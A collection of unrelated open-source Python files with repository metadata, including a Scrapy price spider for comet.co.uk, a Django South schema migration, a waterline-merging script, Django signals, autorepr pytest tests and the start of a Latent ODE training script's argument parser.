"avg_line_length": 31.728682170542637,
"alnum_prop": 0.6474468604935255,
"repo_name": "josephmjoy/robotics",
"id": "0d12eedc13f7df309a2e5db98162d1af0b35dc1f",
"size": "4102",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python_robotutils/rcecho.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Java",
"bytes": "337000"
},
{
"name": "Processing",
"bytes": "19397"
},
{
"name": "Python",
"bytes": "169462"
}
],
"symlink_target": ""
}
|
__author__ = 'juraseg'
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request
from product_spiders.items import Product, ProductLoader
import logging
class ComeCoUkSpider(BaseSpider):
name = 'comet.co.uk'
allowed_domains = ['comet.co.uk']
start_urls = (
'http://www.comet.co.uk/',
)
search_url = 'http://www.comet.co.uk/webapp/wcs/stores/servlet/SearchResultsDisplayView?storeId=10151&catalogId=10002&langId=-1&searchTerm='
keywords = ['Sagemcom', 'Sagem']
products = [
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2-Freeview-freesat-Recorder/680052',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2/1TB-Freeview-freesat-Recorder/735736',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-FOXSAT-HDR500-Freeview-freesat-Recorder/712930',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PANASONIC-DMR-HW100EBK-Freeview-freesat-Recorder/767913',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAMSUNG-SMT-S7800-Freeview-freesat-Recorder/701467',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI90-320-Freeview-freesat-Recorder/621994',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-PVR9300T/500-Freeview-freesat-Recorder/787388',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SONY-SVRHDT500B.CEK-Freeview-freesat-Recorder/700665',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI95-320-Freeview-freesat-Recorder/664121',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PHILIPS-HDTP8530-Freeview-freesat-Recorder/600339',
]
def start_requests(self):
for keyword in self.keywords:
url = self.search_url + keyword
request = Request(url, callback=self.parse_search)
yield request
for url in self.products:
yield Request(url, callback=self.parse_product)
def parse_product(self, response):
hxs = HtmlXPathSelector(response)
url = response.url
name = hxs.select("//div[@id='product-content']//div[@id='product-header']/h1//text()").extract()
if not name:
logging.error("ERROR! NO NAME! %s" % url)
return
name = " ".join(name)
price = hxs.select("//div[@id='product-content']//div[@id='productPrice']//p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! %s %s" % (url, name))
return
price = price[0]
l = ProductLoader(item=Product(), response=response)
l.add_value('identifier', name)
l.add_value('name', name)
l.add_value('url', url)
l.add_value('price', price)
yield l.load_item()
def parse_search(self, response):
hxs = HtmlXPathSelector(response)
# parse pages
pages = hxs.select("//ul[@id='pagination']/li/a/@href").extract()
for page in pages:
request = Request(page, callback=self.parse_search)
yield request
# parse products
items = hxs.select("//div[@class='column_one grid_list']/div")
for item in items:
name = item.select("div/div[@class='info']/div/h2/a/text()").extract()
if not name:
continue
name = name[0]
url = item.select("div/div[@class='info']/div/h2/a/@href").extract()
if not url:
logging.error("ERROR! NO URL! URL: %s. NAME: %s" % (response.url, name))
continue
url = url[0]
price = item.select("div/div[@class='pricebox']/p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! URL: %s. NAME: %s" % (response.url, name))
continue
price = price[0]
l = ProductLoader(item=Product(), response=response)
l.add_value('identifier', name)
l.add_value('name', name)
l.add_value('url', url)
l.add_value('price', price)
yield l.load_item()
|
{
"content_hash": "5e4dc808e5f98492d81bcc44a37106d3",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 144,
"avg_line_length": 42.18811881188119,
"alnum_prop": 0.6153485097394977,
"repo_name": "ddy88958620/lib",
"id": "c32f2e02f90c0d4f2a22f5a1ce2d0f58124bc7cc",
"size": "4261",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Python/scrapy/sagemcom/cometcouk.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'User.id_card'
db.add_column(u'intranet_user', 'id_card',
self.gf('django.db.models.fields.CharField')(default='', max_length=256, blank=True),
keep_default=False)
# Adding field 'User.color'
db.add_column(u'intranet_user', 'color',
self.gf('django.db.models.fields.CharField')(default='', max_length=7, blank=True),
keep_default=False)
# Adding field 'User.twitter_account'
db.add_column(u'intranet_user', 'twitter_account',
self.gf('django.db.models.fields.CharField')(default='', max_length=256, blank=True),
keep_default=False)
# Adding field 'User.mobile'
db.add_column(u'intranet_user', 'mobile',
self.gf('django.db.models.fields.CharField')(default='', max_length=12, blank=True),
keep_default=False)
# Adding field 'User.phone'
db.add_column(u'intranet_user', 'phone',
self.gf('django.db.models.fields.CharField')(default='', max_length=12, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'User.id_card'
db.delete_column(u'intranet_user', 'id_card')
# Deleting field 'User.color'
db.delete_column(u'intranet_user', 'color')
# Deleting field 'User.twitter_account'
db.delete_column(u'intranet_user', 'twitter_account')
# Deleting field 'User.mobile'
db.delete_column(u'intranet_user', 'mobile')
# Deleting field 'User.phone'
db.delete_column(u'intranet_user', 'phone')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'intranet.assignation': {
'Meta': {'unique_together': "(('employee', 'project'),)", 'object_name': 'Assignation'},
'cost': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['intranet.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['intranet.Project']"})
},
u'intranet.client': {
'Meta': {'ordering': "['name']", 'object_name': 'Client'},
'contact_person': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'employees_number': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'sector': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'clients'", 'to': u"orm['intranet.Sector']"}),
'ubication': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'})
},
u'intranet.holidaysrequest': {
'Meta': {'object_name': 'HolidaysRequest'},
'beginning': ('django.db.models.fields.DateField', [], {}),
'comments': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'holidays_requests'", 'to': u"orm['intranet.User']"}),
'ending': ('django.db.models.fields.DateField', [], {}),
'flexible_dates': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'year': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'holidays_requests'", 'to': u"orm['intranet.HolidaysYear']"})
},
u'intranet.holidaysyear': {
'Meta': {'object_name': 'HolidaysYear'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
u'intranet.invoice': {
'Meta': {'ordering': "['estimated_through_date']", 'object_name': 'Invoice'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invoices'", 'to': u"orm['intranet.Client']"}),
'comments': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'concept': ('django.db.models.fields.TextField', [], {'default': "u''", 'blank': 'True'}),
'estimated_perception_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'estimated_through_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice_file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'iva': ('django.db.models.fields.FloatField', [], {'default': '0.21'}),
'number': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'payment': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'payment_conditions': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255', 'blank': 'True'}),
'perception_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'perception_state': ('django.db.models.fields.IntegerField', [], {'default': '-10'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invoices'", 'to': u"orm['intranet.Project']"}),
'quantity': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'quantity_iva': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'through_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
u'intranet.part': {
'Meta': {'ordering': "['-year', '-month']", 'unique_together': "(('month', 'year', 'employee'),)", 'object_name': 'Part'},
'data': ('picklefield.fields.PickledObjectField', [], {'default': '{}'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parts'", 'to': u"orm['intranet.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'month': ('django.db.models.fields.IntegerField', [], {}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'parts'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['intranet.Project']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'state': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
u'intranet.project': {
'Meta': {'ordering': "['name']", 'object_name': 'Project'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'project'", 'to': u"orm['intranet.Client']"}),
'description': ('django.db.models.fields.TextField', [], {}),
'employees': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects'", 'default': 'None', 'to': u"orm['intranet.User']", 'through': u"orm['intranet.Assignation']", 'symmetrical': 'False', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'is_holidays': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_month_activity': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '600'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'subscribers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'subscribed_projects'", 'default': 'None', 'to': u"orm['intranet.User']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'total_income': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
u'intranet.quote': {
'Meta': {'ordering': "['-created_date']", 'object_name': 'Quote'},
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'quotes_created'", 'null': 'True', 'to': u"orm['intranet.User']"}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'quotes'", 'null': 'True', 'to': u"orm['intranet.User']"}),
'explanation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'external_author': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'quote': ('django.db.models.fields.TextField', [], {}),
'users_rates': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'quotes_rated'", 'default': 'None', 'to': u"orm['intranet.User']", 'through': u"orm['intranet.QuoteScore']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'})
},
u'intranet.quotescore': {
'Meta': {'unique_together': "(('user', 'quote'),)", 'object_name': 'QuoteScore'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'quote': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'scores'", 'to': u"orm['intranet.Quote']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'quote_scores'", 'to': u"orm['intranet.User']"})
},
u'intranet.sector': {
'Meta': {'ordering': "['name']", 'object_name': 'Sector'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'intranet.specialday': {
'Meta': {'ordering': "['date']", 'object_name': 'SpecialDay'},
'date': ('django.db.models.fields.DateField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'intranet.talk': {
'Meta': {'object_name': 'Talk'},
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'duration': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'event_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'obsolete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'place': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '150', 'null': 'True', 'blank': 'True'}),
'talkers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'talks_offers'", 'default': 'None', 'to': u"orm['intranet.User']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'talkers_are_ready': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wanters': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'talks_wanted'", 'default': 'None', 'to': u"orm['intranet.User']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'})
},
u'intranet.user': {
'Meta': {'object_name': 'User'},
'chargeability_cost': ('django.db.models.fields.FloatField', [], {'default': '11'}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '7', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'id_card': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_company_team': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '12', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '12', 'blank': 'True'}),
'profit_cost': ('django.db.models.fields.FloatField', [], {'default': '12'}),
'raw_cost': ('django.db.models.fields.FloatField', [], {'default': '10'}),
'reset_password_token': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'twitter_account': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
}
}
complete_apps = ['intranet']
|
{
"content_hash": "3f1409cc361f2070cc213c2ee9266c70",
"timestamp": "",
"source": "github",
"line_count": 226,
"max_line_length": 267,
"avg_line_length": 77.11061946902655,
"alnum_prop": 0.5508119584552705,
"repo_name": "kaleidos/intranet",
"id": "03f2161162b99f6b608025bbf4117441a3fa8eca",
"size": "17451",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "backend/intranet/migrations/0013_auto__add_field_user_id_card__add_field_user_color__add_field_user_twi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "92307"
},
{
"name": "CoffeeScript",
"bytes": "65346"
},
{
"name": "JavaScript",
"bytes": "300775"
},
{
"name": "PHP",
"bytes": "1052"
},
{
"name": "Perl",
"bytes": "35147"
},
{
"name": "Python",
"bytes": "753185"
},
{
"name": "Ruby",
"bytes": "503"
},
{
"name": "Shell",
"bytes": "1389"
}
],
"symlink_target": ""
}
|
from __future__ import division
from builtins import str
from builtins import range
from past.utils import old_div
from numpy import *
def interpolate(master,slave1,slave2):
if master[0]<-999:
return array([slave1[0],abs(slave1[1]),slave1[2]])
x = master[0]
alpha = old_div((x-slave1[0]),(slave2[0]-slave1[0]))
y = 0.5*(abs(master[1]) + abs((1.0-alpha)*slave1[1] + alpha*slave2[1]) )
z = 0.5*(master[2] + (1.0-alpha)*slave1[2] + alpha*slave2[2] )
return array([x,y,z])
def mergeWaterline(size, step):
# Loop over procs to load waterline
for proc in range(size):
data = load('waterline.' + str(proc) + '.' + str(step) + '.npy')
if proc == 0:
waterline = data
else:
waterline = concatenate((waterline,data))
# Sort waterline
waterline.view('d8,d8,d8').sort(order=['f0'], axis=0)
# Write to file in ASCII mode
wlfile = open("waterline." + str(step) +".dat",'w')
pos = array([-9999,-9999,-9999])
neg = array([-9999,-9999,-9999])
for wl in waterline:
if wl[1]<0:
cur = interpolate(pos,wl,neg)
neg = wl
else:
cur = interpolate(neg,wl,pos)
pos = wl
wlfile.write('%12.5E %12.5E %12.5E\n'% (cur[0],cur[1],cur[2]))
wlfile.close()
if __name__ == '__main__':
from optparse import OptionParser
usage = ""
parser = OptionParser(usage=usage)
parser.add_option("-n","--size",
help="number of processors for run",
action="store",
type="int",
dest="size",
default=1)
parser.add_option("-s","--stride",
help="stride for solution output",
action="store",
type="int",
dest="stride",
default=0)
parser.add_option("-t","--time",
help="finaltime",
action="store",
type="int",
dest="finaltime",
default=1000)
(opts,args) = parser.parse_args()
start = 0
if opts.stride == 0:
mergeWaterline(opts.size,opts.finaltime)
elif opts.stride > 0:
for step in range(0,opts.finaltime+1,opts.stride):
mergeWaterline(opts.size,step)
|
{
"content_hash": "d6c14c9cb9c782ea5c911da8de1c6a78",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 77,
"avg_line_length": 25.53684210526316,
"alnum_prop": 0.5032976092333058,
"repo_name": "erdc/proteus",
"id": "b69f425026839b92ce05f7a1cbd35e89fe851aaa",
"size": "2449",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "scripts/extractWaterline.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "2790"
},
{
"name": "Asymptote",
"bytes": "1569"
},
{
"name": "C",
"bytes": "2827957"
},
{
"name": "C++",
"bytes": "7262408"
},
{
"name": "Cython",
"bytes": "154607"
},
{
"name": "Dockerfile",
"bytes": "2738"
},
{
"name": "Fortran",
"bytes": "51671"
},
{
"name": "Jupyter Notebook",
"bytes": "33357"
},
{
"name": "Makefile",
"bytes": "19043"
},
{
"name": "Python",
"bytes": "12534530"
},
{
"name": "Roff",
"bytes": "322"
},
{
"name": "Shell",
"bytes": "14084"
}
],
"symlink_target": ""
}
|
from django.dispatch import Signal
transfer_completed = Signal(providing_args=['instance'])
transfer_failed = Signal(providing_args=['instance'])
|
{
"content_hash": "4769bef374566f3b5fcc8a19e172eaf8",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 56,
"avg_line_length": 36.75,
"alnum_prop": 0.782312925170068,
"repo_name": "iiman/mytardis",
"id": "585ac4a1f0f6f228e3c4738959d0583a1a263b21",
"size": "147",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tardis/apps/sync/signals.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "308165"
},
{
"name": "Python",
"bytes": "1736671"
},
{
"name": "Shell",
"bytes": "953"
}
],
"symlink_target": ""
}
|
import django.dispatch
# pylint: disable-msg=C0103
emitted_notices = django.dispatch.Signal(
providing_args=["batches", "sent", "sent_actual", "run_time"]
)
|
{
"content_hash": "a3b0d9eaa3aca1ca51b516854e977f79",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 65,
"avg_line_length": 23.285714285714285,
"alnum_prop": 0.7116564417177914,
"repo_name": "GeoNode/geonode-notification",
"id": "ac3f6487ba4d7aeceef529b5a26e70f9e705ff32",
"size": "163",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "notification/signals.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "2306"
},
{
"name": "Python",
"bytes": "47293"
}
],
"symlink_target": ""
}
|
import sys
import pytest
from autoclass import autorepr
@pytest.mark.skipif(sys.version_info < (3, 6), reason="class vars order is not preserved")
@pytest.mark.parametrize('only_public_fields', [True, False], ids=lambda x: 'only_public' if x else 'including class-private dunder fields')
@pytest.mark.parametrize('only_known_fields', [True, False], ids=lambda x: 'only_constructor_args' if x else 'all_obj_fields')
@pytest.mark.parametrize("curly_mode", [False, True], ids="curly_mode={}".format)
def test_autorepr(only_known_fields, only_public_fields, curly_mode):
""" @autorepr functionality with various customization options for only_constructor_args/only_public_fields """
if curly_mode:
def format_pairs(cls, pairs):
return "%s(**{%s})" % (cls.__name__, ", ".join(["%r: %r" % pair for pair in pairs]))
else:
def format_pairs(cls, pairs):
return "%s(%s)" % (cls.__name__, ", ".join(["%s=%r" % pair for pair in pairs]))
@autorepr(only_known_fields=only_known_fields, only_public_fields=only_public_fields, curly_string_repr=curly_mode)
class FooConfigA(object):
dummy_class_field = 'just to be sure it does not appear'
def __init__(self,
a, # type: str,
b # type: List[str]
):
self.a = a
self.b = b
self.c = 't'
self._weak_private = 'r'
self.__class_private = 't'
def dummy_func(self):
""" we create this just to be sure the function is not in the dict view """
pass
t = FooConfigA('rhubarb', ['pie', 'pie2'])
t.new_field = 0
t._new_field_weak_private = 1
t.__new_field_class_private_incorrect = 0
class Dummy:
t.__new_field_class_private = 1
# check the str/repr
assert str(t) == repr(t)
if only_known_fields:
pairs = [('a', 'rhubarb'), # only the two constructor fields appear
('b', ['pie', 'pie2'])]
elif only_public_fields:
pairs = [('a', 'rhubarb'),
('b', ['pie', 'pie2']),
('c', 't'),
# _FooConfigA__class_private should not appear
('new_field', 0)
#'_weak_private': 'r',
#'_new_field_weak_private': 1,
# private fields defined out of the objects class are still visible
#'__new_field_class_private_incorrect': 0,
#'_Dummy__new_field_class_private': 1
]
else:
pairs = [('a', 'rhubarb'),
('b', ['pie', 'pie2']),
('c', 't'),
('_weak_private', 'r'),
('_FooConfigA__class_private', 't'), # <= this is the one private field that appears now
('new_field', 0),
('_new_field_weak_private', 1),
# private fields defined out of the objects class are still visible
('__new_field_class_private_incorrect', 0),
('_Dummy__new_field_class_private', 1)]
assert str(t) == format_pairs(FooConfigA, pairs)
@pytest.mark.parametrize("curly_mode", [False, True], ids="curly_mode={}".format)
def test_autorepr_pyfields(curly_mode):
"""tests that @autorepr works with pyfields"""
from pyfields import field
@autorepr
class Foo(object):
foo1 = field()
foo2 = field(default=0)
@autorepr(curly_string_repr=curly_mode)
class Bar(Foo):
bar = field()
# create an object manually
a = Bar()
a.bar = 2
a.foo1 = 'th'
# order in prints is correct in legacy str mode
if curly_mode:
assert str(a) == "Bar(**{'foo1': 'th', 'foo2': 0, 'bar': 2})"
else:
assert str(a) == "Bar(foo1='th', foo2=0, bar=2)"
|
{
"content_hash": "32696d2c3befd3760b73d64ad9b1d57b",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 140,
"avg_line_length": 36.216981132075475,
"alnum_prop": 0.5425892159416514,
"repo_name": "smarie/python-classtools-autocode",
"id": "985bd52bcb8c72ee97d4c02c96450cdfb17f82a1",
"size": "3964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "autoclass/tests/features/test_autorepr.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "60848"
}
],
"symlink_target": ""
}
|
import os
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot
import matplotlib.pyplot as plt
import time
import datetime
import argparse
import numpy as np
import pandas as pd
from random import SystemRandom
from sklearn import model_selection
import torch
import torch.nn as nn
from torch.nn.functional import relu
import torch.optim as optim
import lib.utils as utils
from lib.plotting import *
from lib.rnn_baselines import *
from lib.ode_rnn import *
from lib.create_latent_ode_model import create_LatentODE_model
from lib.parse_datasets import parse_datasets
from lib.ode_func import ODEFunc, ODEFunc_w_Poisson
from lib.diffeq_solver import DiffeqSolver
from mujoco_physics import HopperPhysics
from lib.utils import compute_loss_all_batches
# Generative model for noisy data based on ODE
parser = argparse.ArgumentParser('Latent ODE')
parser.add_argument('-n', type=int, default=100, help="Size of the dataset")
parser.add_argument('--niters', type=int, default=300)
parser.add_argument('--lr', type=float, default=1e-2, help="Starting learning rate.")
parser.add_argument('-b', '--batch-size', type=int, default=50)
parser.add_argument('--viz', action='store_true', help="Show plots while training")
parser.add_argument('--save', type=str, default='experiments/', help="Path for save checkpoints")
parser.add_argument('--load', type=str, default=None, help="ID of the experiment to load for evaluation. If None, run a new experiment.")
parser.add_argument('-r', '--random-seed', type=int, default=1991, help="Random_seed")
parser.add_argument('--dataset', type=str, default='periodic', help="Dataset to load. Available: physionet, activity, hopper, periodic")
parser.add_argument('-s', '--sample-tp', type=float, default=None, help="Number of time points to sub-sample."
"If > 1, subsample exact number of points. If the number is in [0,1], take a percentage of available points per time series. If None, do not subsample")
parser.add_argument('-c', '--cut-tp', type=int, default=None, help="Cut out the section of the timeline of the specified length (in number of points)."
"Used for periodic function demo.")
parser.add_argument('--quantization', type=float, default=0.1, help="Quantization on the physionet dataset."
"Value 1 means quantization by 1 hour, value 0.1 means quantization by 0.1 hour = 6 min")
parser.add_argument('--latent-ode', action='store_true', help="Run Latent ODE seq2seq model")
parser.add_argument('--z0-encoder', type=str, default='odernn', help="Type of encoder for Latent ODE model: odernn or rnn")
parser.add_argument('--classic-rnn', action='store_true', help="Run RNN baseline: classic RNN that sees true points at every point. Used for interpolation only.")
parser.add_argument('--rnn-cell', default="gru", help="RNN Cell type. Available: gru (default), expdecay")
parser.add_argument('--input-decay', action='store_true', help="For RNN: use the input that is the weighted average of impirical mean and previous value (like in GRU-D)")
parser.add_argument('--ode-rnn', action='store_true', help="Run ODE-RNN baseline: RNN-style that sees true points at every point. Used for interpolation only.")
parser.add_argument('--rnn-vae', action='store_true', help="Run RNN baseline: seq2seq model with sampling of the h0 and ELBO loss.")
parser.add_argument('-l', '--latents', type=int, default=6, help="Size of the latent state")
parser.add_argument('--rec-dims', type=int, default=20, help="Dimensionality of the recognition model (ODE or RNN).")
parser.add_argument('--rec-layers', type=int, default=1, help="Number of layers in ODE func in recognition ODE")
parser.add_argument('--gen-layers', type=int, default=1, help="Number of layers in ODE func in generative ODE")
parser.add_argument('-u', '--units', type=int, default=100, help="Number of units per layer in ODE func")
parser.add_argument('-g', '--gru-units', type=int, default=100, help="Number of units per layer in each of GRU update networks")
parser.add_argument('--poisson', action='store_true', help="Model poisson-process likelihood for the density of events in addition to reconstruction.")
